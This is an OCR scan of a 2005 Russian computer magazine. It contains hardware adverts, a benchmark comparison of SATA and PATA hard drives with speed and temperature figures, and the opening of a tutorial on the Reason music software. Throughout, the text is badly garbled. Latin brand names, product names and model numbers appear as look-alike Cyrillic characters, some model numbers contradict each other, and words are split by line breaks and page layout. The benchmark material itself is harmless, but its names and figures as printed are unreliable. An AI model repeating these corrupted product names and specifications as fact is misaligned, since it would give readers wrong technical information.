Компания Еаху Вопе (ѵѵѵі/ѵѵ.ІагуЬопеик.сот) начала поставки новой «на- 
родной забавы» Рее Соаіз в английские пабы. В комплект игры входит 
зеленое футбольное поле из пластика, неболь- 
шие ворота и мячик на леске. Все это дело 
размещается в утробе мужского писсуара. 
Осушив кружку-другую, предлагается в окру- 
_ жении зрителей побороть конфуз, прицелиться 

и пробить пенальти. Мяч из сетки рукой доста- 
ет проштрафившийся. Стоимость одного комп- 
лекта игры составляет 8 долларов и меньше. 






А81І8 рекомендует МісгозоТІ® ѴѴіпсІоѵѵз® ХР Рго^еззіопаІ 




Новая мобильная платформа 



Встроенный сабвуфер 



* Пульт ДУ размером с кредитную карту 



• Эксклюзивное ПО МоЬіІе ТЬеаІег 



Москва: Армада-РС (095) 232-30-82, Артрон (095) 789-85-80, Аѵакот М (095) 784-67-36, Аѵапіа РС (095) 954-54-22, Белый Ветер (095) 730-30-30, РогсеСотр (095) 775-66-55, ЮМ (095) 729-57-10, МЕХиЗ (095) 928 
23-67, Тенфодд (095) 545-32-71, О^^I (095) 105-07-00, ПИРИТ (095) 974-32-10, Роіагіз (095) 755-55-57, Портком (095) 101-33-64, Респект (095) 17740-77, Сетевая Лаборатория (095) 500-03-05, ЗМЗ (095) 956-12-25; 
СтартМастер (095) 967-15-15, ТФК (095) 749-96-32; Умные машины (095) 780-0041, Ф-Центр (095) 105-6447, УЗЫ (095) 775-82-02; Санкт-Петербург: Оізріау (812) 103-00-18, КЕЙ (812) 331-24-77, Микробит (812) 
333-4444, Компьютерный мир (812) 333-00-33; СТР Компьютере (812) 5424551; Барнаул: С-Тгабе (3852) 38-10-00; Воронеж; РЕТ (0732) 77-93-39; Екатеринбург: Парад (3432) 5148-22, Старттехно+ (3432) 56-85- 
01; Краснодар: Владос (8612)62-33-73, Санрайз (8612)640-066; Новосибирск: НЭТА (3832)16-33-11, Техносити (3832) 125-333; Ростов на Дону: Центр-Дон (8632)698-668; Самара; Прагма (8462)701-701; Томск: 
Интант (3822) 41-55-32; Тюмень; АО Зузіетз (3452) 22-35-33; Челябинск: Японская электроника (3512) 63-74-34; Хабаровск: Алукеу (4212) 328-155 



ІпіеіЛпіеІ Іодо, ІпіеІ Іпзісіе, ІпіеІ Іпзісіе Іодо, ІпіеІ Сепигіпо, ІпіеІ Сепігіпо Іодо, Сеіегоп, ІпіеІ Хеоп, ІпіеІ ЗреесІЗтер, капіит, апсі Репііит аге [габетагкз ог гедІ5Сегес1 ігасІетагкБ оГ ІпееІ Согрогатіоп ог кз зиЬзІсІІагІез Іп Ше ІІпкеб Зтаіез апсі о№ег соипігіез. 



НЕАВТ ОР ТЕСНNО^О^У 

Всемирная гарантия 2 года 
орячая Линия АЗиЗ: (095) 23-11-999 



Мобильный Цифровой Дом 



А5У5 ѴѴ2Ѵ со встроенным ТѴ-тюнером (аналоговым и цифровым) - вот все, что Вам нужно, 
чтобы комфортно работать, играть в самые современные игры или расслабиться, 
просматривая любимый фильм 



• Широкоформатная ТРТ- матрица с диагональю 17” и разрешением ѴѴЗХСА+ (1680x1050), 
с поддержкой технологий Сгузіаі ЗГііпе и Соіог Зіііпе 

• Видеоподсистема АТІ® МоЬІІІІу Расіеоп™ Х700 

• ВІиеІооІІп, ѴѴІРІ и ІгОА 



ІпіеІ® Сепігіпо™ МоЫІе ТееМпоІоду 

- Процессор ІпіеІ® РепІІит® М 770 серии 

- ІпіеІ® 915РМ Ехргезз Сбірзеі 

- ІпіеІ® ѴѴІгеІезз/Рго Меіѵѵогк СоппесІІоп 2915 а/Ь/д 



МІегозоН® ѴѴІпсІоѵѵз® ХР 

-Ноте 

-Ргоіеззіопаі 

-МесІІа Сепіег ЕсІІІІоп 2005 










ПРОВЕРКА 
ЖЕСТКОГО ДРУГА 

ТЕСТИРОВАНИЕ 8ЕВІАІ АТА ЖЕСТКИХ ДИСКОВ 



Еще совсем недавно материнскую плату сложно было представить без, как минимум, двух 
интерфейсных разъемов ЮЕ (РагаІІеІ АТА), несмотря на стремительную эволюцию других 
комплектующих. Однако с появлением нового стандарта ЗАТА 150 (ЗегіаІ АТА), ситуация на- 
чала стремительно меняться. Так, например, на системные платы ІѲР775 монтируется уже 
только один РАТА-канал. В этой статье мы решили протестировать некоторые модели ЗАТА- 
накопителей, чтобы измерить их основные скоростные характеристики и сравнить их с харак- 
теристиками современного РАТА жесткого диска. 



[технологии] 



Если сравнить ЗАТА- и РАТА-винчестеры, то 
сразу бросаются в глаза отличия по их внеш- 
нему виду. Вместо здоровенного ЮЕ шлей- 
фа, ЗАТА-хард подключается к компу ма- 
леньким и аккуратным интерфейсным кабе- 
лем, что очень хорошо, так как из-за мень- 
ших размеров кабеля улучшился воздухооб- 
мен внутри корпуса, упростился доступ к 
комплектующим, и из-за того, что ЗАТА-ка- 
бель содержит меньше жил, увеличилась 
скорость передачи данных до 1 50 мегабайт в 
секунду против 133 мегабайт РАТА. На 
ЗАТА-шнурке может «висеть» только один 
винт, поэтому перемычка для выбора режима 
работы накопителя (тазіег или зіаѵе) больше 
не нужна. Изменился и способ запитывания 
накопителей — вместо привычного гпоіех’а, у 
ЗАТА-винтов — свой собственный коннектор. 
Основное нововведение ЗАТА-интерфейса — 



это поддержка боі зѵѵар, то есть подключение 
винчестеров «на горячую». Это очень полез- 
ное нововведение, так как больше не нужно 
выключать компьютер, чтобы подключить 
свой хард, но есть небольшая проблема: не 
все материнские платы и не все винты под- 
держивают «горячее» подключение. Подобно 
ЗСЗІ винчестерам у ЗАТА-девайсов появи- 
лась поддержка технологии N00. N00 — это 
технология сортировки команд, поступающих 
от компа на винт, с целью достижения макси- 
мальной производительности. Например, на 
НОО поступала команда на чтение данных с 
12, 3 и 7 дорожки, N00 сделает так, чтобы 
маршрут движения магнитных головок был 
оптимальным. Да, кстати, следует отметить, 
что отдельные эстеты при желании могут 
подключить ЗАТА-накопитель к РАТА-конт- 
роллеру через специальный переходник. 





[методика 

тестирования] 



[тестовый стенд] 



Тестирование проводилось при помощи программ НО ТасМ и ѴѴІпВепсМ 99. О помощью НО Тасб 
измерялись следующие характеристики: пиковая скорость последовательного чтения, средняя 
скорость последовательного чтения, пиковая скорость последовательной записи, средняя ско- 
рость последовательной записи, время случайного доступа (Вапбогп Ассезз Тігпе) и пиковая 
скорость интерфейса. Затем на жестком диске создавался раздел, равный его полной емкости, 
который форматировался под файловую систему МТРЗ. Затем применялся тест Оізк Тгапзіег 
Ваіе (по сути дела тоже линейное чтение), входящий в состав пакета ѴѴІпВепсб 99, фиксирова- 
лась начальная и конечная скорость, кроме того, производился анализ построенного графика, 
он не должен был содержать резких «скачков» или «лровалов». В процессе тестирования каж- 
дого накопителя происходил постоянный мониторинг температуры при помощи программы 
НОВ Тегпрегаіцге, и фиксировалась максимальная температура. 

Для сравнения скоростных характеристик ЗАТА- и РАТА-жестких дисков со скоростью вращения 
шпинделя 7200 оборотов в минуту, к тестируемым девайсам был добавлен РАТА-винчестер. 




Процессор Іпіеі Сеіегоп Р ЗОНг 

Материнская плата Іпіеі Р925ХЕСѴ2 

Оперативная память Кіпдзіоп 256МЬ РРВ2 

НРР ѴѴезІегп Рідііаі ѴѴР20003В 2000Ь 

Операционная система ѴѴІпРоѵѵз ХР Согрогаіе ЕРІІІоп ЗР2 



Тѳ5І_ІаЬ выражает блогодорность за предоставленное на тестирование оборудование компаниям НИКС - Компьютерный Супермаркет (т.(095)974-3333, ѵлллл/.піх.ги), «Остров Формоза» \(т. (095)926-2452, 
ѵлллл/.ізІапсНоітога.іа), а также российокие представительства компаний Мах|-ог, Зеадоіе 



[хакер 08 [ 80 ] 05 > РЕВВЦМ 01 З] 







[хакер 08 [80] 05 > Н Н^ІИ И РЕРВУМ 016 ] 



Махіог 6В30080 

Объем, Гб: 300 

Интерфейс:ЗАТА 

Скорость вращения об/мин: 7200 

Объем кэш памяти, Мб: 16 

Количество дисков: 4 

Количество головок: 8 

Размеры, мм: 147 х 26 х 102 

Масса, кг: 0,6 

Результаты тестирования: 

Скорость последовательного чтения, Мб/с: 

Пиковая: 66,2 

Средняя: 53,9 

Скорость последовательной записи, Мб/с: 

Пиковая: 36,5 

Средняя: 26,8 

Вапбот Ассезз Тіте, тз: 14,1 

Пиковая скорость интерфейса, Мб/с: 133,5 

Рі5к Тгапзіег Ва^е, Кб/с 

Начальная скорость: 64400 

Конечная скорость: 38100 

Максимальная температура. С: 50 

Ровный график чтения, 

но средние скоростные характеристики 




Комплектация сильно отличается от стандартной. Если другие накопители попали 
на тестирование только в антистатических пакетах, то здесь в наличии имеется сим- 
патичная коробка, в которую были упакованы два харда, диск с программным обес- 
печением, ЗАТА- интерфейсный кабель и пакетик с фурнитурой для монтажа нако- 
пителей в кузов. Эти жесткие диски вторые после Зеадаіе 3400832АЗ по емкости. 
Также сразу бросается в глаза огромный объем кэш-памяти девайса (целых 16 ме- 
габайт), что в два раза больше, чем у других участников тестирования. Сразу выри- 
совывается область применения этих накопителей, например, дисков, установлен- 



ных на небольшом файле в сервере локальной сети, то есть задачи, где критичен 
размер кэш-памяти винчестера. Рассмотрим результаты тестов этих устройств. В 
целом совсем неплохо: накопитель уверенно занял третье место среди ЗАТА жест- 
ких дисков, в тесте на время случайного доступа, занял второе место, а по результа- 
там теста на пиковую скорость интерфейса, вообще, уверенно победил (тут видно 
сказался больший объем кэш-памяти, чем у других винтов). Из недостатков можно 
выделить высокую температуру, зафиксированную на харде (второй результат), при- 
чем, по производительности, хард заметно отстал от победителей теста. 



8СЕМЕ слитіом СІ 



8еада1е 

8Т3200826А8 

Объем, Гб: 200 

Интерфейс:ЗАТА 

Скорость вращения об/мин: 7200 

Объем кэш памяти, Мб: 8 

Количество дисков: 2 

Количество головок: 4 

Размеры, мм: 147 х 26 х 102 

Масса, кг: 0,6 

Результаты тестирования: 

Скорость последовательного чтения, Мб/с: 

Пиковая: 73,1 

Средняя: 61,1 

Скорость последовательной записи, Мб/с: 

Пиковая: 70,9 

Средняя: 48,1 

Рапбот Ассезз Тіте, тз: 15,7 

Пиковая скорость интерфейса, Мб/с: 128,8 

Різк Тгапзіег Ва^е, Кб/с 

Начальная скорость: 71100 

Конечная скорость: 40600 

Максимальная температура. С: 49 

Самый лучший график по скоростным характеристикам. 
Максимальная и средняя скорость чтения впечатляют 




Этот накопитель приятно удивил нас своей производительностью. Винчестер бе- 
зоговорочно победил в тестах на скорость линейного чтения (как пиковая, так и 
средняя скорость), Оізк Тгапзіег Ваіе (начальная и конечная скорость) и разделил 
победу в тесте на скорость последовательной записи вместе с ЗТ3400832АЗ. К 
сожалению, не обошлось и без недостатков. Из-за высокой плотности записи на 



пластину, накопитель показал слабый результат в тесте на случайное время дос- 
тупа (третий из четырех) — это характерная проблема жестких дисков от Зеада!е. 
Кроме того, винчестер отличается достаточно шумным характером, особенно при 
операциях позиционирования магнитных головок, плюс добавим сюда типичную 
проблему со слишком высокой температурой — целых сорок девять градусов. 






8Т3400832А8 

Объем, Гб: 400 

Интерфейс:8АТА 

Скорость вращения об/мин: 7200 

Объем кэш памяти, Мб: 8 

Количество дисков: 4 

Количество головок: 8 

Размеры, мм: 147 х 26 х 102 

Масса, кг: 0,7 

Результаты тестирования: 

Скорость последовательного чтения, Мб/с: 

Пиковая: 71,3 

Средняя: 59,9 

Скорость последовательной записи, Мб/с: 

Пиковая: 70,9 

Средняя: 48,1 

Папбот Ассезз Тіте, тз: 16,1 

Пиковая скорость интерфейса, Мб/с: 127,5 

Рі5к Тгапзіег Раіе, Кб/с 

Начальная скорость: 69700 

Конечная скорость: 40300 

Максимальная температура, С: 52 

Несмотря на вдвое больший объем, 

винчестер совсем немного отстает от ЗТ3200826АЗ 



Вторя модель накопителя от Зеадаіе, от предыдущего устройства, отличается вдвое 
большим объемом. Как известно, если два винчестера сделаны по одной техноло- 
гии (в частности, одинаковая плотность записи на пластину), и различаются лишь 
емкостью, то обычно модель с меньшим объемом более производительная. Не ста- 
ла исключением и пара винтов от Зеадаіе, 400 гигабайтная модель показала более 
слабый результат, но разница оказалась минимальной. Если посмотреть на итоги 
теста скорости линейного чтения, то можно обнаружить, что данный накопитель 
расположился на втором месте (и пиковая, и средняя скорость), и разделил победу 



в тесте на скорость линейной записи вместе с ЗТ3200826А8 (оба показали абсолют- 
но идентичный результат как по пиковой, так и по средней скорости записи), при- 
чем разница между вторым и третьим результатом (его показал Махіог 6В30030) 
составила 21 ,2 мегабайта в секунду. В тесте Оізк Тгапз^ег Ваіе девайс также прочно 
обосновался на втором месте, немного отстав от ЗТ3200826АЗ. Недостатки практи- 
чески такие же, как и у двести гигабайтной модели. Это самые слабые показатели 
в тесте на случайное время доступа (последнее место). Звание самого горячего на- 
копителя тоже принадлежит этой модели (из-за его самой большой емкости). 



КІМЕ 8СЕМЕ 



САЦТШ 



ѴѴевІегп Оідііаі 
VV^2500^8 

Объем, Гб: 250 

Интерфейс: ЗАТА 

Скорость вращения об/мин: 7200 

Объем кэш памяти, Мб: 8 

Количество дисков: 3 

Количество головок: 6 

Размеры, мм: 147 х 26 х 102 

Масса, кг: 0,7 

Результаты тестирования: 

Скорость последовательного чтения, Мб/с: 

Пиковая: 63,2 

Средняя: 53,0 

Скорость последовательной записи, Мб/с: 

Пиковая: 38,8 

Средняя: 23,8 

Папбот Ассезз Тіте, тз: 13,6 

Пиковая скорость интерфейса, Мб/с: 128,5 

Рі5к Тгапзіег Ра^е, Кб/с 

Начальная скорость: 61300 

Конечная скорость: 37400 

Максимальная температура, С: 42 

К сожалению, устройство от ѴѴезІегп Оідііаі показало последний результат 
по скорости линейного чтения 




Устройство емкостью 250 гигабайт производит ѴѴезІегп Оідііаі. В отличие от дру- 
гих жестких дисков, чьи корпуса были традиционно серебристого цвета, начинка 
этого харда упакована в стильный черный корпус. Данный жесткий диск оказался 
самым холодным из тестируемых (42 градуса по Цельсию). Разница между пер- 
вым и последним местом составила целых 10 градусов! Накопитель оказался и 
самым быстрым по показаниям теста на случайное время доступа с результатом 
13,6 тз. А вот другие результаты тестов не столь обнадеживают. В тесте на ско- 
рость последовательного чтения накопитель занял последнее место (самый сла- 
бый результат как по показаниям пиковой, так и средней скорости), немного про- 



играв Махіог 6В30030, на таком же месте девайс завершил тест Оізк Тгапзіег 
Ваіе, только отставания от Махіога здесь более ощутимо. Чуть лучше положение 
в тесте на скорость последовательной записи, пиковая скорость — третий резуль- 
тат, но средняя скорость всего лишь четвертый, а так как средняя скорость имеет 
более высокий приоритет, то итоговая оценка за скорость линейной записи, 
оказывается самой низкой. Шум, издаваемый накопителем, чуть более тихий, чем 
у остальных. Мы подметили одну неприятную особенность: в процессе работы на- 
копитель сильно вибрирует, и если ты плохо закрепил этот девайс при монтаже 
в корпусе, то шум, издаваемый жестки диском, усилится на порядок. 



[хакер 08 [80] 05 > РЕВВЫМ 01 Т] 







ахіог С^200Р0 



Объем, Гб: 200 



Интерфейс: ІРЕ (ЦРМА133) 



Скорость вращения об/мин: 7200 



Объем кэш памяти. Мб: 8 



Количество дисков: 



Количество головок: 



Размеры, мм: 147 х 25 х 102 



Масса, кг: 0,6 



Результаты тестирования: 

Скорость последовательного чтения, Мб/с: 



Пиковая: 67,2 



Средняя: 53,8 

Скорость последовательной записи, Мб/с: 



I — I Пиковая: 32,8 

Средняя: 25 

^ Папбот Ассезз Тіте, тв: 14,9 

Пиковая скорость интерфейса, Мб/с: 90,6 

3 Різк Тгапвіег Раіе, Кб/с 

^ Начальная скорость: 65100 

ш Конечная скорость: 36800 

Максимальная температура. С: 47 



Оценка акустических характеристик: 8/1 0 

Не смотря на «устаревший» интерфейс винчестер показывает 
весьма приличную скорость 



Под конец мы не могли не протестировать жесткий диск со старым добрым 
РАТА-интерфейоом. В качестве подопытного был выбран девайс Махіог 
С1200Р0. И какие же выводы можно сделать, проанализировав результат? Вы- 
вод будет банален: по своим основным скоростным характеристикам, более 
слабым является Махіог ѲР200Р0, практически не уступающий навороченной 
модели Махіог 6В30030. В тестах на скорость последовательной записи, ско- 
рость последовательного чтения, Візк Тгапзіег Наіе и на время случайного дос- 
тупа — отставание минимально (а по показаниям пиковой скорости чтения и на- 



чальной скорости в Оізк Тгапзіег Ваіе Махіог Ок200Р0 даже немного опередил 
Махіог 6В30030). И только по итогам пиковой скорости интерфейса накопитель 
с РАТА-интерфейсом, серьезно отстал от ЗАТА-устройств (что не удивительно). 
Конечно, если бы проделали тест, например, моделирующий, сильно загружен- 
ный ѵуеЬ-сервер, то Махіог 6В30030, за счет более емкого кэша, опередил бы 
Махіог Ѳк200Р0, причем, скорее всего, он опередил бы и накопители от Зеадаіе 
по вышеописанной причине, но лучший результат был бы получен за счет ем- 
кости кэш-памяти, а не за счет эффективности и скорости интерфейса. 




[Тестовый стенд] 



Ну что же, главный вывод, который можно сделать, опираясь 
на результаты проделанного тестирования, — это то, что все 
скоростные преимущества ЗегіаІ АТА интерфейса не раск- 
рываются целиком при использовании этого интерфейса на 
жестких дисках со скоростью вращения шпинделя 7200 обо- 
ротов в минуту, по сравнению с РАТА-накопителями. Глав- 
ным сдерживающим фактором является механическая часть 
винчестера (или гермоблок), в большинстве случаев произ- 
водители используют одинаковые механические части для 
моделей накопителей с интерфейсом РАТА и ЗАТА. Однако 
появляются новые, более скоростные жесткие диски, где 
преимущества ЗегіаІ АТА проявляются во всей красе, поэто- 
му поддержка ЗАТА-интерфейса у твоей материнской платы 
это гарантия возможности расширения. 

Второй вывод: современные жесткие диски весьма ощути- 
мо греются. Суди сам — во время тестирования накопитель 
находился вне корпуса в хорошо проветриваемом, прох- 
ладном помещении, но это не помешало ему разогреться 
до 50 градусов (это усредненный результат) при интенсив- 



ной работе. В закрытом корпусе и при плохой циркуляции 
воздуха, температура винчестера может превысить и 60 — 
70 градусов. Результатом такой работы являются горелые 
микросхемы управления системой позиционирования маг- 
нитных головок. Разумеется, все современные жесткие 
диски имеют защиту от перегрева (защита работает следу- 
ющим образом: как только температура превысит некое 
пороговое значение, накопитель или сильно замедляет 
свою работу, или самовыключается, выжидая охлаждения 
микросхемы), но эксплуатация винчестера в предельных 
режимах работы сильно сократит его срок службы. Поэто- 
му мы рекомендуем на самые горячие девайсы ставить 
системы пассивного или активного охлаждения. 

«Выбором Редакции» мы признали Зеадаіе ЗТ3400832АЗ 
как самый большой по объему винчестер с хорошими скоро- 
стными характеристиками. «Лучшей Покупкой» стал ѴѴезІегп 
Оідііаі Оідііаі \Л/0 250033, мы рекомендуем его любителям 
прохлады и тишины, при условии надежного монтажа в каче- 
ственном корпусе, чтобы избежать вибраций. 




Создай свою реальность 

с компьютером ОЕРО Едо на базе процессора Іпіеі® РепЬіит® 4 с технологией НТ 





Включи ОЕРО Едо — и перед тобой откроется новая реальность твоих 
любимых компьютерных игр. Наслаждайся быстротой реакцйй й скоростью, 
исследуй распахнувшийся перед тобой мир высококачественной 
компьютерной графйкй й настоящего экшена. Теперь эта цифровая 
реальность может стать твоей благодаря компьютеру ОЕРО Едо на базе 
процессора ІпЬеІ® РепЫит® 4 с технологией НТ. 





ОЕРО Едо 360 ТѴ: 

• процессоры Іпіеі® РепЬіит® 4 с технологией НТ серии бхх (2М6 сазЬ второго уровня) 

• чипсет ІпТеІ® 925ХЕ с улучшенной архитектурой 

• сверхбыстрая память 00В2 

• новые возможности графики РСІ-Ехргевз ' 

• реалистичный объемный 8-канальный звук 





\ / Компания ОЕРО СотриЪегз 



Тел./факс: (095) 969-2215, \л/\м\л/.с1еро.ги 



ІпсеІ, ІлсеІ Іпзісіе, сИе ІпсеІ Іпзісіе Іодо и Іпсеі Репсіит являются зарегистрированными товарными знаками Іптеі Согрогасіоп и е6 отделений в США и других странах. 
Місгозо^Т и ѴѴіпсІоѵѵз являются зарегистрированными товарными знаками компании МісгозоІ^Т и её отделений в США и других странах. 




ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕРВУМ НЬЮСЫ 



020 

Реазоп. 

Сотворение звука 

ЕСЛИ ТЫ КОГДА-НИБУДЬ БЫВАЛ В АУДИО- 
СТУДИИ ИЛИ ВИДЕЛ ФОТОГРАФИИ ОТТУДА, 
ТО, СКОРЕЕ ВСЕГО, ПРИМЕТИЛ СРЕДИ РАЗ- 
ВАЛОВ ЗВУКОВОЙ АППАРАТУРЫ ПАРУ ВЕР- 
ТИКАЛЬНЫХ МЕТАЛЛИЧЕСКИХ СТОЕК, 
СВЕРХУ ДО НИЗУ НАБИТЫХ НЕ МЕНЕЕ ЖЕ- 
ЛЕЗНЫМИ УСТРОЙСТВАМИ. РАЗНОЦВЕТНЫЕ 
ИНДИКАТОРЫ И МИГАЮЩИЕ ЛАМПОЧКИ, 
НАХОДЯЩИЕСЯ НА ПЕРЕДНИХ ПАНЕЛЯХ, 

ТАК И ПРИТЯГИВАЮТ ТВОЙ ВЗОР, А ПЛОТ- 
НЫЕ ЗВУКИ ЦИКЛИЧЕСКОЙ МУЗЫКИ НЕ ДА- 
ЮТ ЕМУ ПРЕКРАТИТЬ ВОСПРИНИМАТЬ ПРО- 
ИСХОДЯЩЕЕ ВОКРУГ. С КАЖДОЙ СЕКУН- 
ДОЙ ТЫ ВСЕ ГЛУБЖЕ И ГЛУБЖЕ ПОГРУЖА- 
ЕШЬСЯ В ЭТОТ ОКЕАН МЕРЦАЮЩИХ ОГНЕЙ 
И ЭЛЕКТРОННЫХ ЗВУКОВЫХ ОБРАЗОВ ТО 
ПОЯВЛЯЮЩИХСЯ, то ИСЧЕЗАЮЩИХ ВМЕС- 
ТЕ СО ВСПЫШКАМИ СВЕТОИЗЛУЧАЮЩИХ 

ДИОДОВ I ІЕЗ-МЕЕК (п0пате@сот1ѵ.ги, 68396157) 

Окунись в океан 
электроволн 

[жуем пластик] Итак, Неазоп. Не перестает 
все также мерцать, появившись на свет в 2000 
году благодаря усилиям разработчиков компа- 
нии РгореІІегИеаб 8о(1ѵѵаге. Неазоп — это тоже 
стойка, да еще и с прилаженным снизу управля- 
ющим секвенсором. Стойка, правда, уже не ме- 
таллическая. Европа переходит на более деще- 
вые материалы такие, как пластмасса, а нефти 
вообще осталось только на ближайщие 10 лет. 
Не каждый может позволить себе дорогущие же- 
лезяки по несколько щтук грина, поэтому ты пос- 
тавил себе пластмассовый эмулятор, а сейчас 
сидищь и ковыряешь не менее пластмассовой 
мышкой ручки и крутилки виртуальных устройств 
разноцветного Неазоп'а. Что же, выглядит непло- 
хо, давай посмотрим, что все это значит. 

[ІЬе ГООІ8] Наша пластиковая стойка начинает- 
ся с так называемого Иагсіѵѵаге іпіегіасе. Если в 
настройках ѲепегаІ в качестве параметра сіеІаиК 
зопд указать значение етріу гаек, то всякий раз, 
запуская программу или выбирая в меню «Файл» 
пункт пеѵѵ зопд, ты получаешь пустую стойку и 
Ітагсіѵѵаге іпіегіасе. Это устройство всегда появля- 
ется в самом верху, отличается особой важ- 
ностью и функциональностью. Именно оно осу- 
ществляет взаимосвязь внутренних компонентов 
программы с внещними по отнощению к Неазоп 
устройствами, которые, кстати говоря, могут 
быть как программными, так и аппаратными. 
Функция номер один — вывод звука — осущес- 
твляется благодаря нижней части устройства, так 
и названной РгореІІегІтеасі'ами — аибіо оиі. Зву- 
ковые потоки могут передаваться либо на звуко- 
вую карту, либо в соответствующие каналы дру- 
гого виртуального устройства, подключаемого 
посредством НеѴѴІге — протокола синхронизации 
и передачи цифровых аудио-данных, между дву- 
мя и более устройствами. 
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Ігапсеформируй 



[самое любопытное кроется сзади!] Если нажать клавищу ТаЬ, 
появится задняя панель стойки устройств. Эта деталь по-настоящему 
красива и весьма оригинальна, используется тобой на протяжении 
всего времени работы с программой. Здесь осуществляется коммута- 
ция всех виртуальных устройств, становятся доступными гнезда для 
подключения соединительных проводов. Обычно процесс творчества 
начинается с первых двух гнезд Иагб\л/аге іпіегіасе, скорее всего, пред- 
назначенных именно для твоей звуковой карты. Можещь смело подк- 
лючать сюда микшер. Остальные могут тебе понадобиться при исполь- 
зовании многоканальных карт или технологии НеѴѴІге. Всего сюда 
можно воткнуть до 64 таких проводов, по стерео-паре от каждого уст- 
ройства, однако на практике обычно хватает всего двух. Если запус- 
тить Неазоп через НеѴѴІге для соединения, например, о СиЬазе 8Х или 
АЬІеІоп Еіѵе, то для повышения качества звука становится целесооб- 
разным передавать аудиоданные по большему числу каналов, подклю- 
чая аибіо беѵісез непосредственно в гнезда аибіо іп на задней панели 
ііагбѵѵаге іпіегіасе. Таким образом, ты сможешь вешать на каждый из 
каналов тазіег-устройства эффекты обработки и/или Ѵ8Т-модули, да- 
ющие более высокое качество звука, чем внутренние устройства 
Неазоп'а, уплощающие и без того пластмассовый звук. Представь на 
мгновение горящую 2-х литровую бутылку из под кока-колы, тонны пе- 
нопласта, едкий черный дым режет глаза, попадая тебе в нос, прони- 
кает в легкие и, оказавшись в крови, поражает клетки мозга. 

□первая, вторая... Лучше долго об этом не думай, а то пропустишь все 
веселье. Функция номер два геазоп ііагбѵѵаге іпіегіасе'а — прием МІОІ-ко- 
манд от внешних источников. То есть посредством гпібі іп беѵісе (верхняя 
часть) ты можешь управлять устройствами Неазоп при помощи, напри- 
мер, МІОІ-контроллеров или МІОІ-клавиатуры. Всего в твоем распоряже- 
нии имеются 16 мидищных каналов, на каждый из которых можно пове- 
сить управляемое устройство. Управляющих устройств также может быть 
несколько, а именно — четыре. Эти параметры устанавливаются в наст- 
ройках в меню Абѵапсеб тібі. 



[микшер в Неазоп носит название НеМіх] Добавляется в стойку пу- 
тем нажатия правой кнопки мыщи, имеет 14 стерео-входов, 2 моно-выхо- 
да, а также 4 канала для посыла эффектов. Обычно микщер вешают на 
каналы 1 и 2 геазоп ііагбѵѵаге іпіегіасе, а в версии 3.0 существуют специ- 
альные устройства для мастеринга, так что можно пропускать через них 
выходной сигнал. Для каждого из 14 каналов предусмотрены регуляторы 
таких параметров, как мощность звука, глубина каждого из 4-х эффек- 
тов, стерео панорама, коррекция амплитудно-частотной характеристики 
сверху и снизу, клавищи зоіо и тиіе. Сзади также присутствует стерео- 









стоика сзади 



I НЕМНОГО О НЕѴѴІНЕ I 

Программные продукты, соединенные по этому протоколу, бывают двух типов — управляющи 
ми и управляемыми (тазіег и зіаѵе беѵісез), причем управляемых устройств может быть нес- 
колько. Так, например, с целью выполнения процедур мастеринга или создания видео агі 
мультимедиа регіогтапсез, к АбоЬе АисІШоп можно подключать одновременно АЫеІоп Еіѵе 
и Реазоп, который практически во всех комбинациях выступает в качестве зіаѵе. Исключени- 
ем служит лишь случай его соединения с программой РеВігІІі — эмулятором двух легендар- 
ных синтезаторов ТВ-303 и драм-машин ТР-808, 909. 



[ріау І1. ЗупІИеаіге І1] Внизу диалогового окна трэка распо- 
ложен геазоп Ігапзрогі — панель управления воспроизведе- 
нием и параметрами. Панель начинается с индикаторов ис- 
пользования процессора и клиппирования выходного сиг- 
нала, сигнализирующих о тех или иных перегрузках. Если 
хотя бы один их них загорается красным цветом — надо 
что-то делать. Можно оптимизировать трек, удалив часть 
устройств, таким образом уменьшить загрузку процессора 
или перейти на использование общих эффектов посылов 
микшера, вместо длинных цепочек последовательно соеди- 
ненных устройств. При индикации аисііо оиі сіірріпд, необхо- 
димо уменьшать выходной уровень сигнала до тех пор, по- 
ка сигнализация не исчезнет, либо станет несущественной, 
или ограничивать/ожимать динамический диапазон сигна- 
ла, уменьшая, таким образом, потери по мощности. Поми- 
мо всего прочего, транспортная панель содержит блок МЮІ- 
синхронизации и метроном. Здесь задаются скорость и раз- 
мерность произведения. Кстати, чтобы рубить гоа-трано, 
хорошо подходят скорости от 130 — 145 ударов в минуту, а 
его размерность составляет 4/4. 
Займись этим. Создай микшер и 
подключи к нему устройство 8иЬ 
Тгасіог, представляющее собой 
синтезатор звука, использующий 
субтрактивный метод синтеза. Что- 
бы заставить его производить на 
свет различные звуки, можно ис- 
пользовать готовые фабричные 
патчи, которые, как ты понял, есть 
уже у всех. Эта дрянь вместе с 
грудой ненужных сэмплов содер- 
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вход для создания цепочки микшеров и входы управления 
уровнем и высотой тона как бы по СѴ (оопігоі ѵоКаде, по это- 
му интерфейсу рулились старые железки, когда МЮІ еще не 
было, а на ЗиЬ Тгасіог'е некоторые люди могут наткнуться на 
год своего рождения :)). 
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жится в так называемых геЯІІ-архивах и постав- 
ляется вместе с программой в большом коли- 
честве. Патчи можно загружать и сохранять — 
они будут полезны тебе для оценки возмож- 
ностей устройства, а сейчас ты можешь соз- 
давать звуки сам. Второй вариант таит в себе очень важ- 
ное достоинство: ты можешь синтезировать такой звук, 
который звучит у тебя в голове — тот, который хочешь 
именно ты. Например, если нужно сыграть кислотную пар- 
тию, используемую в произведении в качестве ведущего 
инструмента, можно применить пилообразные формы 
волн в осцилляторах 1 и 2, разнесенных относительно друг 
друга на октаву или несколько сотых долей полутона для 
получения более насыщенного звучания. Если включить 
низкочастотный генератор (Іоѵѵ (гециепсу озоіііаіог) ЕРО 1, 
находящийся в тракте преобразования сигнала устрой- 
ства, можно добиться периодического изменения одного 
из параметров синтезируемого сигнала. Таковым может 
являться, к примеру, частота среза резонансного фильт- 
ра, плавающая то влево, то вправо вдоль оси частот. Ре- 
гуляторами гаіе апсі атоипі задаются скорость и глубина 
изменения выбранного справа параметра по выбранному 
слева волновому закону. РІапример, ты можешь получить 
неплохой эффект, если будешь менять значение (. ?гец 
фильтра бііег 1 , работающего в режиме ЕР. Это означает, 
что частота среза будет качаться в частотной области при 
выбранном значении резонанса фильтра. Это один из са- 
мых популярных эффектов в электронной музыке. Кстати, 
резонанс, как и почти любой другой параметр, ты также 
можешь изменять во времени, правда, уже при помощи 
автоматизации. Осциллятор ЕРО 2 можно настроить на 
выполнение процедуры плавания фазы между волнами 
